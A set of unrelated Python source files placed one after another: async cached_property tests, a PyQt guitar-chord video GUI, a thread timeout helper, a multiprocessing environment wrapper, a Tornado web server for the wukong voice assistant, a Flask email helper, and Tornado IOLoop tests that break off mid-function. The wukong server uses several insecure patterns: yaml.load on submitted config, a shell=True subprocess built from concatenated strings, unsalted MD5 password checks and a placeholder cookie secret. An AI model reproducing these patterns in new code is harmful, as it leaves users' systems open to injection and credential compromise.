# x_orig, inc = x_n_inc
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# inc = tensor_fn(inc, 'float32', dev)
# new_val = x_orig + inc
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_increment(x_orig, inc)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
|
test_async_cached_property.py | # -*- coding: utf-8 -*-
import asyncio
import time
import unittest
from threading import Lock, Thread
from freezegun import freeze_time
import cached_property
def unittest_run_loop(f):
def wrapper(*args, **kwargs):
coro = asyncio.coroutine(f)
future = coro(*args, **kwargs)
loop = asyncio.get_event_loop()
loop.run_until_complete(future)
return wrapper
def CheckFactory(cached_property_decorator, threadsafe=False):
"""
Create dynamically a Check class whose add_cached method is decorated by
the cached_property_decorator.
"""
class Check(object):
def __init__(self):
self.control_total = 0
self.cached_total = 0
self.lock = Lock()
async def add_control(self):
self.control_total += 1
return self.control_total
@cached_property_decorator
async def add_cached(self):
if threadsafe:
time.sleep(1)
# Need to guard this since += isn't atomic.
with self.lock:
self.cached_total += 1
else:
self.cached_total += 1
return self.cached_total
def run_threads(self, num_threads):
threads = []
for _ in range(num_threads):
def call_add_cached():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(self.add_cached)
thread = Thread(target=call_add_cached)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return Check
class TestCachedProperty(unittest.TestCase):
"""Tests for cached_property"""
cached_property_factory = cached_property.cached_property
async def assert_control(self, check, expected):
"""
Assert that both `add_control` and 'control_total` equal `expected`
"""
self.assertEqual(await check.add_control(), expected)
self.assertEqual(check.control_total, expected)
async def assert_cached(self, check, expected):
"""
Assert that both `add_cached` and 'cached_total` equal `expected`
"""
print("assert_cached", check.add_cached)
self.assertEqual(await check.add_cached, expected)
self.assertEqual(check.cached_total, expected)
@unittest_run_loop
async def test_cached_property(self):
Check = CheckFactory(self.cached_property_factory)
check = Check()
# The control shows that we can continue to add 1
await self.assert_control(check, 1)
await self.assert_control(check, 2)
# The cached version demonstrates how nothing is added after the first
await self.assert_cached(check, 1)
await self.assert_cached(check, 1)
# The cache does not expire
with freeze_time("9999-01-01"):
await self.assert_cached(check, 1)
# Typically descriptors return themselves if accessed though the class
# rather than through an instance.
self.assertTrue(isinstance(Check.add_cached, self.cached_property_factory))
@unittest_run_loop
async def test_reset_cached_property(self):
Check = CheckFactory(self.cached_property_factory)
check = Check()
# Run standard cache assertion
await self.assert_cached(check, 1)
await self.assert_cached(check, 1)
# Clear the cache
del check.add_cached
# Value is cached again after the next access
await self.assert_cached(check, 2)
await self.assert_cached(check, 2)
@unittest_run_loop
async def test_none_cached_property(self):
class Check(object):
def __init__(self):
self.cached_total = None
@self.cached_property_factory
async def add_cached(self):
return self.cached_total
await self.assert_cached(Check(), None)
|
gui.py | import os
import threading
from pathlib import Path
from zipfile import ZipFile
import cv2
import tensorflow as tf
from moviepy.audio.io.AudioFileClip import AudioFileClip
from moviepy.video.io.VideoFileClip import VideoFileClip
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QRect, QSize, Qt, QUrl, pyqtSignal
from PyQt5.QtGui import QBrush, QColor, QIcon, QImage, QPalette
from PyQt5.QtMultimedia import QMediaContent, QMediaPlayer
from PyQt5.QtMultimediaWidgets import QVideoWidget
from PyQt5.QtWidgets import (QAction, QFileDialog, QHBoxLayout, QLabel,
QMainWindow, QMenuBar, QPushButton, QSizePolicy,
QVBoxLayout, QWidget)
from functions import create_onset_info, read_song
from modelPredict import model_predict
from settings import MODEL_PATH, SONG_DURATION
class MainWindow(QMainWindow):
class EventWindow(QMainWindow):
state = pyqtSignal(bool)
def closeEvent(self, e):
self.state.emit(False)
@staticmethod
def hhmmss(ms):
h, r = divmod(ms, 360000) #60*60*1000
m, r = divmod(r, 60000) #60*1000
s, _ = divmod(r, 1000) #1000
return ("%02d:%02d:%02d" % (h, m, s)) if m else ("%02d:%02d" % (m, s))
def setupUi(self, MainWindow):
self.sizeWin = QSize(640, 360)
self.setMinimumSize(self.sizeWin)
self.central_widget = QWidget(MainWindow)
size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Maximum)
size_policy.setHeightForWidth(
self.central_widget.sizePolicy().hasHeightForWidth())
self.central_widget.setSizePolicy(size_policy)
self.horizontal_layout = QHBoxLayout(self.central_widget)
self.horizontal_layout.setContentsMargins(11, 11, 11, 11)
self.vertical_layout = QVBoxLayout()
self.horizontal_layout_4 = QHBoxLayout()
self.viewer = self.EventWindow(self)
self.viewer.setWindowFlags(
self.viewer.windowFlags() | Qt.WindowStaysOnTopHint)
self.viewer.setMinimumSize(self.sizeWin)
self.vertical_layout.addWidget(self.viewer)
self.currentTimeLabel = QLabel(self.central_widget)
self.currentTimeLabel.setMinimumSize(QSize(80, 0))
self.currentTimeLabel.setAlignment(
Qt.AlignRight | Qt.AlignTrailing | Qt.AlignVCenter)
self.horizontal_layout_4.addWidget(self.currentTimeLabel)
self.timeSlider = QtWidgets.QSlider(self.central_widget)
self.timeSlider.setOrientation(QtCore.Qt.Horizontal)
self.horizontal_layout_4.addWidget(self.timeSlider)
self.totalTimeLabel = QtWidgets.QLabel(self.central_widget)
self.totalTimeLabel.setMinimumSize(QtCore.QSize(80, 0))
self.totalTimeLabel.setAlignment(
QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)
self.horizontal_layout_4.addWidget(self.totalTimeLabel)
self.vertical_layout.addLayout(self.horizontal_layout_4)
self.horizontal_layout_5 = QtWidgets.QHBoxLayout()
self.horizontal_layout_5.setSpacing(6)
self.play_button = QPushButton(QIcon("guiIcons/control.png"), "", self)
self.horizontal_layout_5.addWidget(self.play_button)
self.pause_button = QPushButton(QIcon("guiIcons/control-pause.png"), "", self)
self.horizontal_layout_5.addWidget(self.pause_button)
self.stopButton = QPushButton(QIcon("guiIcons/control-stop-square.png"), "", self)
self.horizontal_layout_5.addWidget(self.stopButton)
spacerItem = QtWidgets.QSpacerItem(
40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontal_layout_5.addItem(spacerItem)
self.label = QtWidgets.QLabel(self.central_widget)
self.label.setPixmap(QtGui.QPixmap("guiIcons/speaker-volume.png"))
self.horizontal_layout_5.addWidget(self.label)
self.volumeSlider = QtWidgets.QSlider(self.central_widget)
self.volumeSlider.setMaximum(100)
self.volumeSlider.setProperty("value", 100)
self.volumeSlider.setOrientation(QtCore.Qt.Horizontal)
self.horizontal_layout_5.addWidget(self.volumeSlider)
self.vertical_layout.addLayout(self.horizontal_layout_5)
self.horizontal_layout.addLayout(self.vertical_layout)
MainWindow.setCentralWidget(self.central_widget)
self.menuBar = QMenuBar(MainWindow)
self.menuBar.setGeometry(QRect(0, 0, 484, 22))
self.menuFIle = QtWidgets.QMenu(self.menuBar)
MainWindow.setMenuBar(self.menuBar)
self.open_file_action = QAction(QIcon(
"guiIcons\\directory.png"), "&Choose audio file in wav or mp3 format", self)
self.menuFIle.addAction(self.open_file_action)
self.menuBar.addAction(self.menuFIle.menuAction())
self.currentTimeLabel.setText("0:00")
self.totalTimeLabel.setText("0:00")
self.menuFIle.setTitle("Open audio file")
self.open_file_action.setText("Open audio file")
def __init__(self):
super(MainWindow, self).__init__()
self.setWindowTitle("Guitario")
self.setWindowIcon(QIcon('guiIcons\\music.png'))
self.sizeWin = QSize(480, 360)
self.setMinimumSize(self.sizeWin)
# Fusion palettle, all thanks to author, https://gist.github.com/QuantumCD/6245215
palette = QPalette()
palette.setColor(QPalette.Window, QColor(53, 53, 53))
palette.setColor(QPalette.WindowText, Qt.white)
palette.setColor(QPalette.Base, QColor(25, 25, 25))
palette.setColor(QPalette.AlternateBase, QColor(53, 53, 53))
palette.setColor(QPalette.ToolTipBase, Qt.white)
palette.setColor(QPalette.ToolTipText, Qt.white)
palette.setColor(QPalette.Text, Qt.white)
palette.setColor(QPalette.Button, QColor(53, 53, 53))
palette.setColor(QPalette.ButtonText, Qt.white)
palette.setColor(QPalette.BrightText, Qt.red)
palette.setColor(QPalette.Link, QColor(42, 130, 218))
palette.setColor(QPalette.Highlight, QColor(42, 130, 218))
palette.setColor(QPalette.HighlightedText, Qt.black)
oImage = QImage("guiIcons\\guitarWallPaper.png")
sImage = oImage.scaled(self.sizeWin)
palette.setBrush(QPalette.Background, QBrush(sImage))
self.setPalette(palette)
self.setupUi(self)
# Setup QMediaPlayer
self.player = QMediaPlayer(None, QMediaPlayer.VideoSurface)
self.player.error.connect(self.erroralert)
videoWidget = QVideoWidget()
self.viewer.setCentralWidget(videoWidget)
self.player.setVideoOutput(videoWidget)
# Connect control buttons/slides for QMediaPlayer
self.play_button.pressed.connect(self.player.play)
self.pause_button.pressed.connect(self.player.pause)
self.stopButton.pressed.connect(self.player.stop)
self.volumeSlider.valueChanged.connect(self.player.setVolume)
self.player.durationChanged.connect(self.update_duration)
self.player.positionChanged.connect(self.update_position)
self.timeSlider.valueChanged.connect(self.player.setPosition)
self.open_file_action.triggered.connect(self.open_file)
#! LOADING MODEL
self.working = False
threading.Thread(target=self.load_model).start()
def update_duration(self, duration):
self.timeSlider.setMaximum(duration)
if duration >= 0 and self.loading == False:
self.totalTimeLabel.setText(self.hhmmss(duration))
def update_position(self, position):
if self.loading == False:
if position >= 0:
self.currentTimeLabel.setText(self.hhmmss(position))
# Disable the events to prevent updating triggering a setPosition event
self.timeSlider.blockSignals(True)
self.timeSlider.setValue(position)
self.timeSlider.blockSignals(False)
def toggle_viewer(self, state):
if state:
self.viewer.show()
else:
self.viewer.hide()
def extract_ziped_model(self):
with ZipFile(MODEL_PATH + '.zip', 'r') as zip:
print('Extracting model files! (first time program runs)')
zip.extractall('models')
print('Extracting model from zip file finished! (first time program runs)')
os.remove(MODEL_PATH + '.zip')
def load_model(self):
print("Loading model!")
if not os.path.isdir(MODEL_PATH):
self.extract_ziped_model()
self.model = tf.keras.models.load_model(MODEL_PATH)
print("Ready to load the song!")
def song_thread(self):
self.working = True
self.timeSlider.blockSignals(True)
self.loading = True
self.player.setMedia(QMediaContent(
QUrl.fromLocalFile("guiIcons\\loading.gif")))
self.viewer.setVisible(True)
self.player.play
print("Creating chords for song ", self.song)
print("Please wait!")
detection_list, duration_list = create_onset_info(
self.song, SONG_DURATION, False)
prediction_list = model_predict(self.model, detection_list)
print("Found chord: ", prediction_list)
#output frame resoultion for video
image_shape = (200, 300)
#creating folder saved_accords if does not exist
Path("saved_accords").mkdir(parents=True, exist_ok=True)
#!using cv2 to create videoClip
VIDEO_FPS = 60
VIDEO_PATH = "saved_accords\\" + os.path.basename(self.song[:-4])
VIDEO_PATH_AVI = VIDEO_PATH + "_GENERATED.avi"
out = cv2.VideoWriter(VIDEO_PATH_AVI, cv2.VideoWriter_fourcc(
'M', 'J', 'P', 'G'), VIDEO_FPS, image_shape)
timer = 0.0
time_adder = 1/VIDEO_FPS
for i in range(len(detection_list)):
chord_image_path = "Guitar chords\\" + prediction_list[i] + '.png'
chord_end = timer + duration_list[i]
img = cv2.imread(chord_image_path)
img = cv2.resize(img, image_shape, interpolation=cv2.INTER_AREA)
while timer <= chord_end:
out.write(img)
timer += time_adder
out.release()
# adding sound to clip
video = VideoFileClip(VIDEO_PATH_AVI, audio=False)
audio = AudioFileClip(self.song)
final = video.set_audio(audio)
final.write_videofile(VIDEO_PATH + ".mp4", codec='mpeg4',
audio_codec='libvorbis', fps=VIDEO_FPS)
self.player.stop
self.loading = False
self.player.setMedia(QMediaContent(
QUrl.fromLocalFile(VIDEO_PATH + ".mp4")))
self.timeSlider.blockSignals(False)
self.player.play
os.remove(VIDEO_PATH_AVI)
self.working = False
def open_file(self):
path, _ = QFileDialog.getOpenFileName(
self, "Open file", "", "wav or mp3 files (*.wav *.mp3)")
if path != "" and self.working == False:
self.song = read_song(path)
if self.song != None:
threading.Thread(target=self.song_thread).start()
def erroralert(self, *args):
print(args)
|
utilities.py | """Utility functions for PyNLPIR unit tests."""
import functools
from threading import Thread
def timeout(timeout):
"""Executes a function call or times out after *timeout* seconds.
Inspired by: http://stackoverflow.com/a/21861599.
Example:
func = timeout(timeout=1)(open)
try:
func('test.txt')
except RuntimeError:
print('open() timed out.')
"""
def deco(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
res = [RuntimeError('function {0} timeout'.format(func.__name__))]
def new_func():
try:
res[0] = func(*args, **kwargs)
except RuntimeError as e:
res[0] = e
t = Thread(target=new_func)
t.daemon = True
try:
t.start()
t.join(timeout)
except Exception as je:
print('Error starting thread')
raise je
ret = res[0]
if isinstance(ret, BaseException):
raise ret
return ret
return wrapper
return deco
|
subproc_vec_env.py | import numpy as np
from multiprocessing import Process, Pipe
from src.common.vec_env import VecEnv
def worker(remote, env_fn_wrapper):
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.action_space, env.observation_space))
else:
raise NotImplementedError
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns):
"""
envs: list of gym environments to run in subprocesses
"""
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, CloudpickleWrapper(env_fn)))
for (work_remote, env_fn) in zip(self.work_remotes, env_fns)]
for p in self.ps:
p.start()
self.remotes[0].send(('get_spaces', None))
self.action_space, self.observation_space = self.remotes[0].recv()
def step(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
results = [remote.recv() for remote in self.remotes]
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
@property
def num_envs(self):
return len(self.remotes)
|
server.py | import os
import yaml
import json
import time
import base64
import random
import hashlib
import asyncio
import requests
import markdown
import threading
import subprocess
import tornado.web
import tornado.ioloop
import tornado.options
import tornado.httpserver
from tools import make_json, solr_tools
from robot import config, utils, logging, Updater, constants
logger = logging.getLogger(__name__)
conversation, wukong = None, None
commiting = False
suggestions = [
"现在几点",
"你吃饭了吗",
"上海的天气",
"写一首关于大海的诗",
"来玩成语接龙",
"我有多少邮件",
"你叫什么名字",
"讲个笑话",
]
class BaseHandler(tornado.web.RequestHandler):
def isValidated(self):
if not self.get_secure_cookie("validation"):
return False
return str(
self.get_secure_cookie("validation"), encoding="utf-8"
) == config.get("/server/validate", "")
def validate(self, validation):
if '"' in validation:
validation = validation.replace('"', "")
return validation == config.get("/server/validate", "") or validation == str(
self.get_cookie("validation")
)
class MainHandler(BaseHandler):
def get(self):
global conversation, wukong, suggestions
if not self.isValidated():
self.redirect("/login")
return
if conversation:
info = Updater.fetch(wukong._dev)
suggestion = random.choice(suggestions)
notices = None
if "notices" in info:
notices = info["notices"]
self.render(
"index.html", update_info=info, suggestion=suggestion, notices=notices
)
else:
self.render("index.html")
class MessageUpdatesHandler(BaseHandler):
"""Long-polling request for new messages.
Waits until new messages are available before returning anything.
"""
async def post(self):
if not self.validate(self.get_argument("validate", default=None)):
res = {"code": 1, "message": "illegal visit"}
self.write(json.dumps(res))
else:
cursor = self.get_argument("cursor", None)
messages = conversation.getHistory().get_messages_since(cursor)
while not messages:
# Save the Future returned here so we can cancel it in
# on_connection_close.
self.wait_future = conversation.getHistory().cond.wait()
try:
await self.wait_future
except asyncio.CancelledError:
return
messages = conversation.getHistory().get_messages_since(cursor)
if self.request.connection.stream.closed():
return
res = {"code": 0, "message": "ok", "history": json.dumps(messages)}
self.write(json.dumps(res))
def on_connection_close(self):
self.wait_future.cancel()
class ChatHandler(BaseHandler):
def onResp(self, msg, audio, plugin):
logger.debug("response msg: {}".format(msg))
res = {
"code": 0,
"message": "ok",
"resp": msg,
"audio": audio,
"plugin": plugin,
}
self.write(json.dumps(res))
def post(self):
global conversation
if self.validate(self.get_argument("validate", default=None)):
if self.get_argument("type") == "text":
query = self.get_argument("query")
uuid = self.get_argument("uuid")
if query == "":
res = {"code": 1, "message": "query text is empty"}
self.write(json.dumps(res))
else:
conversation.doResponse(
query,
uuid,
onSay=lambda msg, audio, plugin: self.onResp(
msg, audio, plugin
),
)
elif self.get_argument("type") == "voice":
voice_data = self.get_argument("voice")
tmpfile = utils.write_temp_file(base64.b64decode(voice_data), ".wav")
fname, suffix = os.path.splitext(tmpfile)
nfile = fname + "-16k" + suffix
# downsampling
soxCall = "sox " + tmpfile + " " + nfile + " rate 16k"
subprocess.call([soxCall], shell=True, close_fds=True)
utils.check_and_delete(tmpfile)
conversation.doConverse(
nfile,
onSay=lambda msg, audio, plugin: self.onResp(msg, audio, plugin),
)
else:
res = {"code": 1, "message": "illegal type"}
self.write(json.dumps(res))
else:
res = {"code": 1, "message": "illegal visit"}
self.write(json.dumps(res))
self.finish()
class GetHistoryHandler(BaseHandler):
def get(self):
global conversation
if not self.validate(self.get_argument("validate", default=None)):
res = {"code": 1, "message": "illegal visit"}
self.write(json.dumps(res))
else:
res = {
"code": 0,
"message": "ok",
"history": json.dumps(conversation.getHistory().cache),
}
self.write(json.dumps(res))
self.finish()
class GetConfigHandler(BaseHandler):
def get(self):
if not self.validate(self.get_argument("validate", default=None)):
res = {"code": 1, "message": "illegal visit"}
self.write(json.dumps(res))
else:
key = self.get_argument("key", default="")
res = ""
if key == "":
res = {
"code": 0,
"message": "ok",
"config": config.getText(),
"sensitivity": config.get("sensitivity", 0.5),
}
else:
res = {"code": 0, "message": "ok", "value": config.get(key)}
self.write(json.dumps(res))
self.finish()
class GetLogHandler(BaseHandler):
def get(self):
if not self.validate(self.get_argument("validate", default=None)):
res = {"code": 1, "message": "illegal visit"}
self.write(json.dumps(res))
else:
lines = self.get_argument("lines", default=200)
res = {"code": 0, "message": "ok", "log": logging.readLog(lines)}
self.write(json.dumps(res))
self.finish()
class LogHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render("log.html")
class OperateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument("validate", default=None)):
if self.get_argument("type") == "restart":
res = {"code": 0, "message": "ok"}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {"code": 1, "message": "illegal type"}
self.write(json.dumps(res))
self.finish()
else:
res = {"code": 1, "message": "illegal visit"}
self.write(json.dumps(res))
self.finish()
class ConfigHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render("config.html", sensitivity=config.get("sensitivity"))
def post(self):
if self.validate(self.get_argument("validate", default=None)):
configStr = self.get_argument("config")
try:
yaml.load(configStr)
config.dump(configStr)
res = {"code": 0, "message": "ok"}
self.write(json.dumps(res))
except:
res = {"code": 1, "message": "YAML解析失败,请检查内容"}
self.write(json.dumps(res))
else:
res = {"code": 1, "message": "illegal visit"}
self.write(json.dumps(res))
self.finish()
class DonateHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
return
r = requests.get(
"https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/donate.md"
)
content = markdown.markdown(
r.text,
extensions=["codehilite", "tables", "fenced_code", "meta", "nl2br", "toc"],
)
self.render("donate.html", content=content)
class QAHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ""
with open(constants.getQAPath(), "r") as f:
content = f.read()
self.render("qa.html", content=content)
def post(self):
if self.validate(self.get_argument("validate", default=None)):
qaStr = self.get_argument("qa")
qaJson = os.path.join(constants.TEMP_PATH, "qa_json")
try:
make_json.convert(qaStr, qaJson)
solr_tools.clear_documents(
config.get("/anyq/host", "0.0.0.0"),
"collection1",
config.get("/anyq/solr_port", "8900"),
)
solr_tools.upload_documents(
config.get("/anyq/host", "0.0.0.0"),
"collection1",
config.get("/anyq/solr_port", "8900"),
qaJson,
10,
)
with open(constants.getQAPath(), "w") as f:
f.write(qaStr)
res = {"code": 0, "message": "ok"}
self.write(json.dumps(res))
except Exception as e:
logger.error(e)
res = {"code": 1, "message": "提交失败,请检查内容"}
self.write(json.dumps(res))
else:
res = {"code": 1, "message": "illegal visit"}
self.write(json.dumps(res))
self.finish()
class APIHandler(BaseHandler):
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ""
r = requests.get(
"https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/api.md"
)
content = markdown.markdown(
r.text,
extensions=[
"codehilite",
"tables",
"fenced_code",
"meta",
"nl2br",
"toc",
],
)
self.render("api.html", content=content)
class UpdateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument("validate", default=None)):
if wukong.update():
res = {"code": 0, "message": "ok"}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {"code": 1, "message": "更新失败,请手动更新"}
self.write(json.dumps(res))
else:
res = {"code": 1, "message": "illegal visit"}
self.write(json.dumps(res))
self.finish()
class LoginHandler(BaseHandler):
def get(self):
if self.isValidated():
self.redirect("/")
else:
self.render("login.html", error=None)
def post(self):
if self.get_argument("username") == config.get(
"/server/username"
) and hashlib.md5(
self.get_argument("password").encode("utf-8")
).hexdigest() == config.get(
"/server/validate"
):
print("success")
self.set_secure_cookie("validation", config.get("/server/validate"))
self.redirect("/")
else:
self.render("login.html", error="登录失败")
class LogoutHandler(BaseHandler):
def get(self):
if self.isValidated():
self.set_secure_cookie("validation", "")
self.redirect("/login")
settings = {
"cookie_secret": config.get(
"/server/cookie_secret", "__GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__"
),
"template_path": os.path.join(constants.APP_PATH, "server/templates"),
"static_path": os.path.join(constants.APP_PATH, "server/static"),
"login_url": "/login",
"debug": False,
}
application = tornado.web.Application(
[
(r"/", MainHandler),
(r"/login", LoginHandler),
(r"/gethistory", GetHistoryHandler),
(r"/chat", ChatHandler),
(r"/chat/updates", MessageUpdatesHandler),
(r"/config", ConfigHandler),
(r"/getconfig", GetConfigHandler),
(r"/operate", OperateHandler),
(r"/getlog", GetLogHandler),
(r"/log", LogHandler),
(r"/logout", LogoutHandler),
(r"/api", APIHandler),
(r"/qa", QAHandler),
(r"/upgrade", UpdateHandler),
(r"/donate", DonateHandler),
(
r"/photo/(.+\.(?:png|jpg|jpeg|bmp|gif|JPG|PNG|JPEG|BMP|GIF))",
tornado.web.StaticFileHandler,
{"path": config.get("/camera/dest_path", "server/static")},
),
(
r"/audio/(.+\.(?:mp3|wav|pcm))",
tornado.web.StaticFileHandler,
{"path": constants.TEMP_PATH},
),
(r"/static/(.*)", tornado.web.StaticFileHandler, {"path": "server/static"}),
],
**settings
)
def start_server(con, wk):
global conversation, wukong
conversation = con
wukong = wk
if config.get("/server/enable", False):
port = config.get("/server/port", "5000")
try:
asyncio.set_event_loop(asyncio.new_event_loop())
application.listen(int(port))
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
logger.critical("服务器启动失败: {}".format(e))
def run(conversation, wukong):
t = threading.Thread(target=lambda: start_server(conversation, wukong))
t.start()
|
email_.py | from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr |
ioloop_test.py | from concurrent.futures import ThreadPoolExecutor
from concurrent import futures
from collections.abc import Generator
import contextlib
import datetime
import functools
import socket
import subprocess
import sys
import threading
import time
import types
from unittest import mock
import unittest
from tornado.escape import native_str
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError, PeriodicCallback
from tornado.log import app_log
from tornado.testing import (
AsyncTestCase,
bind_unused_port,
ExpectLog,
gen_test,
setup_with_context_manager,
)
from tornado.test.util import (
ignore_deprecation,
skipIfNonUnix,
skipOnTravis,
)
from tornado.concurrent import Future
import typing
if typing.TYPE_CHECKING:
from typing import List # noqa: F401
class TestIOLoop(AsyncTestCase):
def test_add_callback_return_sequence(self):
# A callback returning {} or [] shouldn't spin the CPU, see Issue #1803.
self.calls = 0
loop = self.io_loop
test = self
old_add_callback = loop.add_callback
def add_callback(self, callback, *args, **kwargs):
test.calls += 1
old_add_callback(callback, *args, **kwargs)
loop.add_callback = types.MethodType(add_callback, loop) # type: ignore
loop.add_callback(lambda: {}) # type: ignore
loop.add_callback(lambda: []) # type: ignore
loop.add_timeout(datetime.timedelta(milliseconds=50), loop.stop)
loop.start()
self.assertLess(self.calls, 10)
@skipOnTravis
def test_add_callback_wakeup(self):
# Make sure that add_callback from inside a running IOLoop
# wakes up the IOLoop immediately instead of waiting for a timeout.
def callback():
self.called = True
self.stop()
def schedule_callback():
self.called = False
self.io_loop.add_callback(callback)
# Store away the time so we can check if we woke up immediately
self.start_time = time.time()
self.io_loop.add_timeout(self.io_loop.time(), schedule_callback)
self.wait()
self.assertAlmostEqual(time.time(), self.start_time, places=2)
self.assertTrue(self.called)
@skipOnTravis
def test_add_callback_wakeup_other_thread(self):
def target():
# sleep a bit to let the ioloop go into its poll loop
time.sleep(0.01)
self.stop_time = time.time()
self.io_loop.add_callback(self.stop)
thread = threading.Thread(target=target)
self.io_loop.add_callback(thread.start)
self.wait()
delta = time.time() - self.stop_time
self.assertLess(delta, 0.1)
thread.join()
def test_add_timeout_timedelta(self):
self.io_loop.add_timeout(datetime.timedelta(microseconds=1), self.stop)
self.wait()
def test_multiple_add(self):
sock, port = bind_unused_port()
try:
self.io_loop.add_handler(
sock.fileno(), lambda fd, events: None, IOLoop.READ
)
# Attempting to add the same handler twice fails
# (with a platform-dependent exception)
self.assertRaises(
Exception,
self.io_loop.add_handler,
sock.fileno(),
lambda fd, events: None,
IOLoop.READ,
)
finally:
self.io_loop.remove_handler(sock.fileno())
sock.close()
def test_remove_without_add(self):
# remove_handler should not throw an exception if called on an fd
# was never added.
sock, port = bind_unused_port()
try:
self.io_loop.remove_handler(sock.fileno())
finally:
sock.close()
def test_add_callback_from_signal(self):
# cheat a little bit and just run this normally, since we can't
# easily simulate the races that happen with real signal handlers
self.io_loop.add_callback_from_signal(self.stop)
self.wait()
def test_add_callback_from_signal_other_thread(self):
# Very crude test, just to make sure that we cover this case.
# This also happens to be the first test where we run an IOLoop in
# a non-main thread.
other_ioloop = IOLoop()
thread = threading.Thread(target=other_ioloop.start)
thread.start()
other_ioloop.add_callback_from_signal(other_ioloop.stop)
thread.join()
other_ioloop.close()
def test_add_callback_while_closing(self):
# add_callback should not fail if it races with another thread
# closing the IOLoop. The callbacks are dropped silently
# without executing.
closing = threading.Event()
def target():
other_ioloop.add_callback(other_ioloop.stop)
other_ioloop.start()
closing.set()
other_ioloop.close(all_fds=True)
other_ioloop = IOLoop()
thread = threading.Thread(target=target)
thread.start()
closing.wait()
for i in range(1000):
other_ioloop.add_callback(lambda: None)
@skipIfNonUnix # just because socketpair is so convenient
def test_read_while_writeable(self):
# Ensure that write events don't come in while we're waiting for
# a read and haven't asked for writeability. (the reverse is
# difficult to test for)
client, server = socket.socketpair()
try:
def handler(fd, events):
self.assertEqual(events, IOLoop.READ)
self.stop()
self.io_loop.add_handler(client.fileno(), handler, IOLoop.READ)
self.io_loop.add_timeout(
self.io_loop.time() + 0.01, functools.partial(server.send, b"asdf")
)
self.wait()
self.io_loop.remove_handler(client.fileno())
finally:
client.close()
server.close()
def test_remove_timeout_after_fire(self):
# It is not an error to call remove_timeout after it has run.
handle = self.io_loop.add_timeout(self.io_loop.time(), self.stop)
self.wait()
self.io_loop.remove_timeout(handle)
def test_remove_timeout_cleanup(self):
# Add and remove enough callbacks to trigger cleanup.
# Not a very thorough test, but it ensures that the cleanup code
# gets executed and doesn't blow up. This test is only really useful
# on PollIOLoop subclasses, but it should run silently on any
# implementation.
for i in range(2000):
timeout = self.io_loop.add_timeout(self.io_loop.time() + 3600, lambda: None)
self.io_loop.remove_timeout(timeout)
# HACK: wait two IOLoop iterations for the GC to happen.
self.io_loop.add_callback(lambda: self.io_loop.add_callback(self.stop))
self.wait()
def test_remove_timeout_from_timeout(self):
calls = [False, False]
# Schedule several callbacks and wait for them all to come due at once.
# t2 should be cancelled by t1, even though it is already scheduled to
# be run before the ioloop even looks at it.
now = self.io_loop.time()
def t1():
calls[0] = True
self.io_loop.remove_timeout(t2_handle)
self.io_loop.add_timeout(now + 0.01, t1)
def t2():
calls[1] = True
t2_handle = self.io_loop.add_timeout(now + 0.02, t2)
self.io_loop.add_timeout(now + 0.03, self.stop)
time.sleep(0.03)
self.wait()
self.assertEqual(calls, [True, False])
def test_timeout_with_arguments(self):
# This tests that all the timeout methods pass through *args correctly.
results = [] # type: List[int]
